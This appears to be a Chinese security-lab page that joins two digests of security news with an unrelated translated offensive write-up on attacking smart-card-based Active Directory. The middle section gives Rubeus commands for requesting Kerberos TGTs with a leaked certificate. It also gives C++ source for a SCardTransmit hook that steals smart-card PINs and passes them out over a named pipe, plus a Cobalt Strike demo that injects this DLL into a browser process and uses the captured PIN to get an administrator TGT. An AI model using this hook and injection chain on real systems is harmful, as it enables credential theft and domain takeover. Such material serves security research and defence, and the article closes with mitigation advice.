1、CheckMate勒索软件以流行的文件共享协议为目标发动攻击 https://cybernews.com/security/checkmate-ransomware-victims/ CheckMate勒索软件运营商一直以用于文件共享的服务器消息块(SMB)通信协议为目标，以危害受害者的网络。与大多数勒索活动不同，CheckMate于2022年被发现，在其整个活动过程中一直保持沉默。据研究人员所知，它不运营数据泄露站点。这对于勒索软件活动来说是非常不寻常的，因为许多知名团伙吹嘘目标并将他们作为受害者发布在他们的数据泄露网站上。他们这样做是为了增加受害者支付赎金的压力。在获得对SMB共享的访问权限后，威胁行为者会加密所有文件并留下勒索票据，要求支付赎金以 2、 XWorm恶意软件利用Follina漏洞发起新一轮攻击 https://thehackernews.com/2023/05/xworm-malware-exploits-follina.html 网络安全研究人员发现了一项正在进行的网络钓鱼活动，该活动利用独特的攻击链在目标系统上传播XWorm恶意软件。研究人员揭示了威胁行为者以预订为主题的诱饵，以欺骗受害者打开能够传递XWorm和Agent Tesla有效载荷的恶意文档。这些攻击从网络钓鱼攻击开始，以分发诱饵Microsoft Word文档，并不是使用宏，而是利用Follina漏洞（CVE-2022-30190，CVSS评分：7.8）来投放混淆的PowerShell脚本。威胁行为者利用Power 3、攻击者可利用Netgear路由器漏洞发动远程攻击 https://thehackernews.com/2023/05/netgear-routers-flaws-expose-users-to.html Netgear RAX30路由器中披露了多达五个安全漏洞，这些漏洞可以通过链接绕过身份验证并实现远程代码执行。Claroty安全研究员Uri Katz在一份报告中说：“成功的攻击可能允许攻击者监控用户的互联网活动、劫持互联网连接并将流量重定向到恶意网站或将恶意软件注入网络流量。”此外，与网络相邻的威胁行为者还可以利用漏洞来访问和控制网络智能设备，如安全摄像头、恒温器、智能锁；篡改路由器设置，甚至使用受感染的网络对其他设备或网络发起攻击。 4、Uintah Basin Healthcare泄露十万多名患者的数据 https://www.govinfosecurity.com/uintah-basin-healthcare-data-breach-affects-over-100000-a-22066 犹他州的一家农村医疗保健提供者向十万多人通报了一起黑客事件，该事件涉及接受治疗长达十年之久的个人的健康信息。Uintah Basin Healthcare周三开始通知患者，它在11月检测到其网络上存在“异常活动”。因此，黑客可能访问或窃取了2012年3月至去年11月期间接受治疗的103974名患者的患者数据。医疗保健中心女发言人Maigen Zobell告诉信息安全媒体集团，“没有证据表明滥用或企图滥用 5、爱荷华大学医院和诊所因向Facebook非法披露PHI而被起诉 https://www.hipaajournal.com/university-of-iowa-hospitals-and-clinics-sued-unlawful-disclosure-phi-facebook/ 美国爱荷华州南区地方法院已提起诉讼，指控爱荷华大学医院和诊所(UIHC)在未征得患者同意的情况下，非法、疏忽和鲁莽地向Facebook披露患者的私人信息。最近发表在《卫生事务》上的一项研究发现，美国98.6%的非联邦急救医院网站在其网站上都有跟踪像素，这些像素收集敏感数据并将其传输给Meta(Facebook)、谷歌和其他第三方，传输的信息可用于多种目的。使用这些代码片段会导致 6、美国交通部遭入侵，23.7万政府人员数据遭泄露 https://www.freebuf.com/news/366467.html 知情人士周五表示，美国交通部（USDOT）发生了一起数据泄露事件，暴露了23.7万名现任和前任联邦政府人员的个人信息。该事件攻击了用于处理TRANServe交通福利的系统，这些福利津贴用于发放政府人员的一些通勤费用。目前尚不清楚这些个人信息是否被用于犯罪目的。 7、恶意机器人现在占所有互联网流量的 30% https://www.infosecurity-magazine.com/news/bad-bots-now-comprise-30-of-all/ 2022年以来，来自恶意软件的互联网流量增加了 5.2021%，达到 30% 以上——这是自 Imperva 于 2013 年发布第一份恶意机器人报告以来的最高数字。 8、西班牙警方取缔大规模网络犯罪团伙，40人被捕 https://thehackernews.com/2023/05/spanish-police-takes-down-massive.html 西班牙国家警察表示，它逮捕了40人，因为他们涉嫌参与一个名为Trinitarians的有组织犯罪团伙。 9、WhatsApp上未知国际号码的视频通话诈骗，在印度兴起 https://thecyberexpress.com/unknown-international-calls-whatsapp-scams/ 接听来自未知国际号码的WhatsApp电话...这就是一个来自孟买的30岁男子损失30万卢比所需要的一切。这就是诈骗者在最新的WhatsApp性勒索骗局中勒索钱财的容易程度，针对的是印度毫无戒心的WhatsApp用户。 10、孟加拉国神秘团队声称对埃塞俄比亚卫生部的网络攻击负责 https://thecyberexpress.com/ethiopian-ministry-of-health-cyber-attack/ 黑客组织孟加拉国神秘团队对埃塞俄比亚卫生部的网络攻击负责。该网站在我们初步调查期间无法访问，现已上线。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

最近，我参与了一项攻击基于智能卡的活动目录的工作。实际上，你根本不需要使用物理智能卡来验证登录这个活动目录。证书的属性决定了它是否可以用于基于智能卡进行登录。因此，如果你能获得相应的私钥，那么就可以绕过智能卡的验证实现登录。 当用户被设置为基于智能卡进行登录时，在它的默认配置中，域控制器将接受任何由它所信任的证书授权机构签署的、符合以下规范的证书：     ● CRL的分配点不可为空、并且可用     ● 证书的密钥要使用数字签名     ● 增强型的密钥使用：        - 智能卡登录        - 客户端认证（可选，用于基于SSL的认证）     ● 包含用户UPN的主题替代名称 此外，如果启用了允许使用无扩展密钥的证书属性组策略，那么就没必要使用增强型的密钥。因为这可能会导致发给域用户或计算机的其他类型的证书。 下面是我们的具体的研究过程。 PKINIT 正如我们所知的，域内的活动目录会使用Kerberos协议来验证域名。攻击者可以使用像Rubeus、Mimikatz、Kekeo和impacket这样的工具来针对域环境进行利用。 那么，基于 PKI 的认证与 Kerberos 的认证有什么关系呢？早在 2006 年，微软和航空航天公司联合提交了 RFC 4556。这协议引入了对 Kerberos 预认证的公钥密码学的支持。 预认证方法可以防止Kerberos对账户密码进行离线暴力攻击。如果没有在AD账户上启用预认证，那么用户就容易受到AS-REP的攻击。随着预认证的引入，那么最初的AS-REQ Kerberos请求就会包含一个加密的时间戳。并且这个用来加密的密钥来自于用户的密码。这向 KDC 证明了请求登录的用户确实知道账户密码。因此，KDC就会返回一个与用户密码相关的加密的AS-REP（对AS-REQ的响应）。预认证数据包含的一个时间戳也可以防止重放攻击。如果预认证数据无效，KDC会返回一个错误，而且也不允许对AS-REP响应密钥进行暴力破解。如果一个攻击者能够在一个网络中抓取 Kerberos的响应数据包，那 基于 PKI 的认证同样也是以类似的方式进行工作。它首先会使用 Kerberos 预认证来证明用户是他们所说的那个人。同样，它也会使用一个时间戳，但不是使用用户的密码生成的密钥对信息进行加密，而是用属于证书的私钥以PKCS #7加密信息语法（CMS）的形式来签署信息。该私钥可以存储于物理智能卡上，并且也可以以其他的形式进行存储，这其中也包括不那么安全的方法。一旦KDC验证了CMS有效载荷的签名，并且一切正常，那么AS-REP就会返回给客户。PKINIT也会对AS-REP响应进行加密。因为在基于PKI的Kerberos登录过程中并没有使用密码，所以用户密钥对客户来说是未知的。为了解决这个问题，A 从这里开始，其他的一切还都保持不变。客户端将会获得一个有效的TGT，可用于申请TGS票据。并且该证书在TGT的有效期内就不再使用，在再次需要该证书的私钥之前，一般会保持7天的有效期。当然，这并不是说在Windows登录期间，私钥在7天内不会被使用。如果机器被锁定或用户已经被注销，那么Windows会像基于密码的登录那样强制进行认证。但从攻击者的角度来看，如果他们已经获得了TGT，这其实就已经不重要了。 所以这里我开始尝试在Rubeus中添加对PKINIT的支持，并创建了一个请求。 基于PKCS#12的认证(PFX) 这里我们讨论的第一个攻击场景是用户私钥泄露问题。我们可以使用一个PKCS#12证书库，我们可以使用一个用户的证书以及相应的私钥来生成一个Kerberos TGT。一旦你有了私钥blob和相应的证书，那么你就可以使用OpenSSL来生成PKCS12存储，如下所示： openssl pkcs12 -export -out leaked.pfx -inkey privateKey.key -in certificate.crt 一旦你生成了一个有效的证书存储，那么我们就可以使用Rubeus中新增加的内容来请求TGT了。如果你决定用密码来保护证书库，那么你可以在命令行中加入/password选项。 Rubeus.exe asktgt /user:Administrator /certificate:leaked.pfx /domain:hacklab.local /dc:dc.hacklab.local 然后，Rubeus将生成一个基于PKINIT的AS-REQ，使用我们所提供的证书库来验证用户。如果一切顺利，KDC就会返回数据包，那么你就应该会得到类似的输出： ______       _ (_____ \     | |   _____) )_   _| |__ _____ _   _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_|   |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Ask TGT [*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local [*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator' [+] TGT request successful! [*] base64(ticket.kirbi):     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 ServiceName           : krbtgt/hacklab.local ServiceRealm         : HACKLAB.LOCAL UserName             : Administrator UserRealm             : HACKLAB.LOCAL StartTime             :  02/04/2023 16:01:12 EndTime               :  03/04/2023 02:01:12 RenewTill             :  09/04/2023 16:01:12 Flags                 : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType               : rc4_hmac Base64(key)           :  6tIiFytU5V2cgSpXt8skdw== 那么由此产生的 .kirbi Base64 编码字符串也可用于从 KDC中获得正常的 TGS。 在我成功地在这个工具中使用了PKINIT之后，我开始思考我们该如何使用物理智能卡做认证。一旦用户的机器受到攻击破坏，那么使用智能卡进行认证最大的问题就是密码。如果不知道PIN码，那么我们就无法生成一个有效的AS-REQ。蛮力破解是不可行的，因为进行3次无效的尝试，那么系统就会先进行账号锁定。 其中的一个思路就是，当用户需要解锁智能卡时可以尝试捕获PIN码。这主要用于机器解锁或者登录网络上其他需要智能卡认证的服务。 经过一番调查，我发现了WinSCard DLL。这个DLL是与Smard Card服务通信的网关。然后这个服务就会控制智能卡的通信。一般来说，任何与Windows上的智能卡进行通信的东西都需要使用WinSCard API。 我所研究的WinSCard.dll中最重要的函数是SCardTransmit API。这个API是用于传输智能卡ISO/IEC 7816规范中所要求的应用协议数据单元（APDU）的API。这个是最底层的传输单元，主要是用于智能卡通信。 如果我们hook这个API，那么我们应该就能够监视传送到卡上的PDU。 LONG SCardTransmit(  SCARDHANDLE         hCard,  LPCSCARD_IO_REQUEST pioSendPci,  LPCBYTE             pbSendBuffer,  DWORD               cbSendLength,  LPSCARD_IO_REQUEST  pioRecvPci,  LPBYTE              pbRecvBuffer,  LPDWORD             pcbRecvLength ); pbSendBuffer参数是向卡片发送的APDU数据包，而pbRecvBuffer则是智能卡返回的响应数据。 虽然ISO智能卡规范对某些命令类别和命令数据结构做出了限制，但这些限制通常是针对某些具体应用的，而不是由ISO智能卡规范本身定义的。并且为了满足身份访问的需求，NIST制定了个人身份验证（PIV）SP 800-73-4规范。该规范涵盖了智能卡应如何处理注册到设备上的证书，以及实现该规范的所有APU，这个不需要太多的细节。在PIV规范中最重要的是第3.2.1节VERIFY卡命令。这些内容阐述了VERIFY APDU是如何在允许访问存储在卡片上的私钥之前进行PIN的验证。 因此，有了ISO规范中的信息以及PIV规范中的3.2.1节，我们应该能够写一个hook程序来捕获传送到卡上的PIN。 DWORD WINAPI SCardTransmit_Hooked(SCARDHANDLE hCard,    LPCSCARD_IO_REQUEST pioSendPci,    LPCBYTE             pbSendBuffer,    DWORD               cbSendLength,    LPSCARD_IO_REQUEST  pioRecvPci,    LPBYTE              pbRecvBuffer,    LPDWORD             pcbRecvLength) {        char debugString[1024] = { 0 };    DWORD result = pOriginalpSCardTransmit(hCard, pioRecvPci, pbSendBuffer, cbSendLength, pioRecvPci, pbRecvBuffer, pcbRecvLength);    //Check for CLA 0, INS 0x20 (VERIFY) and P1 of 00/FF according to NIST.SP.800-73-4 (PIV) specification    if (cbSendLength >= 13 && pbSendBuffer[0] == 0 && pbSendBuffer[1] == 0x20 && (pbSendBuffer[2] == 0 || pbSendBuffer[2] == 0xff)) {        //Check card response status for success        bool success = false;        if (pbRecvBuffer[0] == 0x90 && pbRecvBuffer[1] == 0x00) {            success = true;       }        char asciiPin[9];        sprintf_s(debugString, sizeof(debugString), "Swipped VERIFY PIN: Type %s, Valid: %s, Pin: %s", GetPinType(pbSendBuffer[3]), success ? "true" : "false",            GetPinAsASCII(pbSendBuffer+5, min(pbSendBuffer[4],8), asciiPin));        SendPINOverPipe(debugString);             }    return result; } API调用做的第一件事就是调用原始的SCardTransmit函数。我们不仅需要研究数据请求，而且还要知道卡的响应数据。这样我们就可以确定传送给卡片的PIN码是否正确。然后，该函数会查找VERIFY PDU来隔离验证PIN的命令。一旦我们确定了VERIFY PDU，那么我们就可以开始检查结果，0x90 0x00都表示PIN被审核。接下来，我们可以从发送缓冲区的偏移量5（PDU结构中的命令数据）的位置处提取PIN码。最后，我们需要通过一个命名管道来传输PIN码的详细信息，然后使用数据接收程序进行捕获。 我们可以将这一功能打包到一个DLL中，该DLL也能够进行反射性加载，那么我们可以将该DLL注入到我们所研究的进程中去。 Demo 假设在存在该漏洞的情况下，并且我已经有了一个Cobalt Strike信标连接到了受害者的工作站上。我所使用的是管理员账户，但其实普通用户的账户也可以进行使用。PinSwipe DLL也可以被注入到一个高权限的进程中，如lsass，当获得管理权限时，可以在登录时刷出PIN码，但使用普通用户身份进行访问时，你将会被限制在用户模式进程中，如Internet Explorer等等。 所以首先我们需要启动PinSwipeListener，这将可以dump出智能卡登录EKU的用户证书信息。 beacon> execute-assembly C:\tools\PinSwipeListener.exe [*] Tasked beacon to run .NET program: PinSwipeListener.exe [+] host called home, sent: 112171 bytes [+] received output: [+] Found smart card logon certificate with thumbprint 55C65AB0B9B6A893A6E8449FB34DD61093B231D8 and subject CN=Administrator, CN=Users, DC=hacklab, DC=loca 有了监听器，我们就需要选择将PinSwipe.dll注入到哪些进程中。像Internet Explorer、Chrome等都是很好的选择，因为在智能卡认证的环境中，这些程序会经常弹出请求PIN的信息。在这里，我运行的是Internet Explorer，它的PID是 2678。实际上，IE和Chrome一样，为浏览器的各种标签都启动了不同的子进程。所以你需要注入一个正确的进程。同时也可以使用其他更高级的攻击脚本，不断寻找新的IE进程并注入它们。 beacon> dllinject 2678 C:\tools\PinSwipe.dll [*] Tasked beacon to inject C:\tools\PinSwipe.dll into 2678 一旦用户在对话框中输入了他们的PIN码，PinSwipe就会捕获请求并通过命名管道将其发送给PinSwipeListener。 [+] received output: [+] PinSwipe: Swipped VERIFY PIN: Type PIV Card Application, Valid: true, Pin: 123456 PinSwipe的输出除了显示输入的PIN号码外，还将显示输入的PIN是否正确。一旦你获取了PIN码，你就可以使用新的Rubeus功能来请求使用用户的物理智能卡进行TGT验证。这一次，我们可以使用/certificate参数来指定所要使用的证书的文件名。 beacon> execute-assembly C:\tools\Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc:192.168.74.2 /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456 [*] Tasked beacon to run .NET program: Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc:192.168.74.2 /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456 [+] host called home, sent: 357691 bytes [+] received output:   ______       _                       (_____ \     | |                       _____) )_   _| |__ _____ _   _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_|   |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Ask TGT [+] received output: [*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local [*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator' [+] received output: [+] TGT request successful! [+] received output: [*] base64(ticket.kirbi):     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 ServiceName           : krbtgt/hacklab.local ServiceRealm         : HACKLAB.LOCAL UserName             : Administrator UserRealm             : HACKLAB.LOCAL StartTime             : 04/04/2023 19:55:29 EndTime               : 05/04/2023 05:55:29 RenewTill             : 11/04/2023 19:55:29 Flags                 : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType               : rc4_hmac Base64(key)           : 5K2V8xIaGbUS8ZYqTl120Q== 那么到此结束。你现在已经有了一个TGT，并且可以在7天内申请新的TGS票，然后访问其他的网络资源。 当你在网络中使用物理智能卡时，最好的办法是拥有需要手动按键的卡，或者最好是生物识别阅读器。这样一来，对用户账户进行的任何攻击都不会产生TGT数据，因为智能卡会在没有物理按键或生物识别数据存在的情况下阻止对私钥的访问。

1、研究人员发现更隐蔽的Linux BPFDoor恶意软件版本 https://www.bleepingcomputer.com/news/security/stealthier-version-of-linux-bpfdoor-malware-spotted-in-the-wild/ 研究人员近期发现Linux恶意软件“BPFDoor”的一种新的、更隐蔽的变体，具有更强大的加密和反向shell通信。BPFDoor是一种隐蔽的后门恶意软件，至少从2017年开始活跃，但直到大约12个月前才被安全研究人员发现。该恶意软件的名称来源于使用“Berkley 数据包过滤器”(BPF)在绕过传入流量防火墙限制的同时接收指令。BPFDoor旨在允许威胁行为者在被破坏的 2、9个勒索软件团伙使用Babuk代码加密VMWare ESXi服务器 https://www.sentinelone.com/labs/hypervisor-ransomware-multiple-threat-actor-groups-hop-on-leaked-babuk-code-to-build-esxi-lockers/ 越来越多的勒索软件团伙正在采用泄露的Babuk勒索软件源代码来创建针对VMware ESXi服务器的Linux加密器。SentinelLabs安全研究人员在发现2022年下半年至2023年上半年之间连续出现的九种基于Babuk的勒索软件变体后，观察到了这一上升趋势。SentinelLabs威胁研究员Alex Delamotte表示： 3、瑞士大型跨国企业ABB遭受Black Basta勒索软件攻击 https://www.bleepingcomputer.com/news/security/multinational-tech-firm-abb-hit-by-black-basta-ransomware-attack/ 领先的电气化和自动化技术提供商瑞士跨国公司ABB遭受了Black Basta勒索软件攻击，据报道影响了业务运营。ABB总部位于瑞士苏黎世，拥有约105000名员工，2022年的收入为294亿美元。作为其服务的一部分，该公司为制造和能源供应商开发工业控制系统(ICS)和SCADA系统。5月7日，该公司成为2022年4月浮出水面的网络犯罪组织Black Basta发起的勒索 4、Brightly Software通知客户SchoolDude平台数据被攻击者窃取 https://www.bleepingcomputer.com/news/security/brightly-warns-of-schooldude-data-breach-exposing-credentials/ 美国科技公司和西门子子公司Brightly Software通知客户，他们的个人信息和凭据被获得其SchoolDude在线平台数据库访问权限的攻击者窃取。SchoolDude是一个基于云的平台，用于管理来自学区多达600000名学生的7000多所学院、大学使用的工单。公司的其他SaaS解决方案被全球12000多家组织使用，其中大部分来自美国、加拿大、英国和澳大利亚。该事件涉及 5、微软强制号码匹配以对抗MFA疲劳攻击 https://www.bleepingcomputer.com/news/microsoft/microsoft-enforces-number-matching-to-fight-mfa-fatigue-attacks/ Microsoft已开始在Microsoft Authenticator推送通知中强制执行号码匹配，以抵御多重身份验证(MFA)疲劳攻击。在此类攻击（也称为推送轰炸或MFA推送垃圾邮件）中，网络犯罪分子向目标发送大量移动推送通知，要求他们批准使用窃取的凭据登录其公司帐户的尝试。在许多情况下，目标会屈服于重复的恶意MFA推送请求，要么是错误的，要么是为了停止看似无穷无尽的 6、BlackSuit勒索软件针对Windows和Linux用户发起攻击 https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/ Cyble Research and Intelligence Labs(CRIL)观察到，启动Linux变体（例如Cylance和Royal勒索软件）的勒索软件组织数量有所增加。这可以归因于这样一个事实，即Linux被广泛用作各个领域的操作系统，包括企业环境和云计算平台。Linux的广泛使用使其成为勒索软件组织的一个有吸引力的目标，因为一次攻击可能会危及多个系统。根据研究人员的观察，已发现BlackSuit Linu 7、Bl00dy勒索软件利用PaperCut漏洞针对教育机构发起攻击 https://www.bleepingcomputer.com/news/security/fbi-bl00dy-ransomware-targets-education-orgs-in-papercut-attacks/ FBI和CISA发布了一份联合公告，警告Bl00dy勒索软件团伙现在也在积极利用PaperCut远程代码执行漏洞来获得对网络的初始访问权限。美国网络安全和基础设施安全局提到，威胁行为者将攻击重点放在了教育部门，该部门公开暴露了该漏洞。PaperCut漏洞被追踪为CVE-2023-27350，是影响PaperCut MF和PaperCut NG的严重远程代码执行 (RCE 8、丰田披露200万客户汽车位置数据泄露长达十年 https://www.bleepingcomputer.com/news/security/toyota-car-location-data-of-2-million-customers-exposed-for-ten-years/ 丰田汽车公司披露了其云环境的数据泄露事件，从2013年11月6日到2023年4月17日，这十年间暴露了2150000名客户的汽车位置信息。根据该公司日本新闻编辑室发布的安全通知，数据泄露是由于数据库配置错误导致任何人无需密码即可访问其内容。该事件暴露了2012年1月2日至2023年4月17日期间使用该公司T-Connect G-Link、G-Link Lite 9、RapperBot 僵尸网络的最新变种增加了加密劫持功能 https://securityaffairs.com/146207/malware/rapperbot-botnet-adds-cryptojacking.html FortiGuard 实验室的研究人员发现了 RapperBot 僵尸网络的新样本，该样本增加了加密劫持功能。 10、Discord披露一起由于第三方代理遭到入侵导致的数据泄露事件 https://securityaffairs.com/146171/data-breach/discord-suffered-data-breach.html Discord正在通知用户在第三方支持代理的帐户遭到入侵后发生的数据泄露事件。安全漏洞暴露了代理的支持票队列，其中包含用户电子邮件地址、与Discord支持交换的消息以及作为票的一部分发送的任何附件。Discord表示，一旦事件被发现，它会立即通过禁用支持帐户来解决被破坏的支持帐户。“由于事件的性质，您的电子邮件地址、客户服务消息的内容以及您与Discord之间发送的任何附件可能已经暴露给第三方，”Discord在发给受影响用户的信 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

